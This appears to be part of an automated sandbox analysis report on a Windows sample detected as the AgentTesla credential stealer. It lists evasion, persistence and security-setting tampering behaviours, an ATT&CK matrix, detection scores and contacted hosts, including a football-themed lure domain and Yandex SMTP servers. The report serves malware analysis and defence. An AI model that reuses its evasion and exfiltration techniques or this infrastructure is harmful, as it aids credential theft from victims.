            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe VolumeInformation
            Source: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\qINcOlwRud.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Lowering of HIPS / PFW / Operating System Security Settings:

            barindex
            Changes security center settings (notifications, updates, antivirus, firewall)Show sources
            Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
            Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.43826f0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.434c6d0.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.434c6d0.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.43826f0.7.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.43826f0.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.434c6d0.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.434c6d0.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.qINcOlwRud.exe.43826f0.7.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Registry Run Keys / Startup Folder1Process Injection11Masquerading113Input Capture1Security Software Discovery351Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobDLL Side-Loading1Registry Run Keys / Startup Folder1Disable or Modify Tools21LSASS MemoryProcess Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion361Security Account ManagerVirtualization/Sandbox Evasion361SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Information Discovery123Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383942 Sample: qINcOlwRud.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 62 smtp.yandex.ru 2->62 64 smtp.yandex.com 2->64 70 Found malware configuration 2->70 72 Multi AV Scanner detection for dropped file 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 5 other signatures 2->76 8 qINcOlwRud.exe 18 7 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        17 7 other processes 2->17 signatures3 process4 dnsIp5 66 myliverpoolnews.cf 104.21.56.119, 443, 49682, 49683 CLOUDFLARENETUS United States 8->66 58 C:\Program Files\Common Files\...\svchost.exe, PE32 8->58 dropped 60 C:\...\svchost.exe:Zone.Identifier, ASCII 8->60 dropped 78 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->78 80 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 8->80 82 Adds a directory exclusion to Windows Defender 8->82 88 2 other signatures 8->88 19 WerFault.exe 8->19         started        22 cmd.exe 1 8->22         started        24 powershell.exe 17 8->24         started        32 3 other processes 8->32 84 Hides threads from debuggers 13->84 26 cmd.exe 13->26         started        28 powershell.exe 13->28         started        30 powershell.exe 13->30         started        34 2 other processes 13->34 36 3 other processes 15->36 68 127.0.0.1 unknown unknown 17->68 86 Changes security center settings (notifications, updates, antivirus, firewall) 17->86 file6 signatures7 process8 file9 56 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 19->56 dropped 50 2 other processes 22->50 38 conhost.exe 24->38         started        52 2 other processes 26->52 40 conhost.exe 28->40         started        42 conhost.exe 30->42         started        44 conhost.exe 32->44         started        46 conhost.exe 32->46         started        48 conhost.exe 34->48         started        54 3 other processes 36->54 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            qINcOlwRud.exe22%VirustotalBrowse
            qINcOlwRud.exe27%ReversingLabsByteCode-MSIL.Trojan.Pwsx
            qINcOlwRud.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe100%Joe Sandbox ML
            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe27%ReversingLabsByteCode-MSIL.Trojan.Pwsx

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            myliverpoolnews.cf5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
            https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
            https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
            https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
            https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html4%VirustotalBrowse
            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.html0%Avira URL Cloudsafe
            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
            https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
            https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
            https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
            https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            smtp.yandex.ru
            		77.88.21.158
            		truefalse
              		high
              myliverpoolnews.cf
              		104.21.56.119
              		truefalseunknown
              smtp.yandex.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-6C1A7BF393BEFEDE5EF77372F8A536BC.htmlfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.htmlfalse
                • 4%, Virustotal, Browse
                • Avira URL Cloud: safe
                		unknown
                http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A8BB9FBC655E731A0C6CD58E2C4B52B7.htmlfalse
                • Avira URL Cloud: safe
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 00000015.00000002.326476300.0000023ABEC3D000.00000004.00000001.sdmpfalse
                  		high
                  https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 00000015.00000003.314649604.0000023ABEC54000.00000004.00000001.sdmpfalse
                    		high
                    https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpgqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://c.amazon-adsystem.com/aax2/apstag.jsqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                      		high
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                        		high
                        https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000015.00000003.313784192.0000023ABEC49000.00000004.00000001.sdmpfalse
                          		high
                          https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000015.00000002.326636259.0000023ABEC42000.00000004.00000001.sdmpfalse
                            		high
                            https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jpqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.liverpool.com/all-about/premier-leagueqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpgqINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pngqINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.liverpool.com/liverpool-fc-news/qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmp, qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850qINcOlwRud.exe, 00000000.00000003.216213463.0000000004615000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02qINcOlwRud.exe, 00000000.00000002.271324177.000000000304A000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000015.00000003.313555750.0000023ABEC60000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameqINcOlwRud.exe, 00000000.00000002.270729266.0000000002FF1000.00000004.00000001.sdmpfalse
                                		high
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipqINcOlwRud.exe, 00000000.00000002.304230234.000000000434C000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
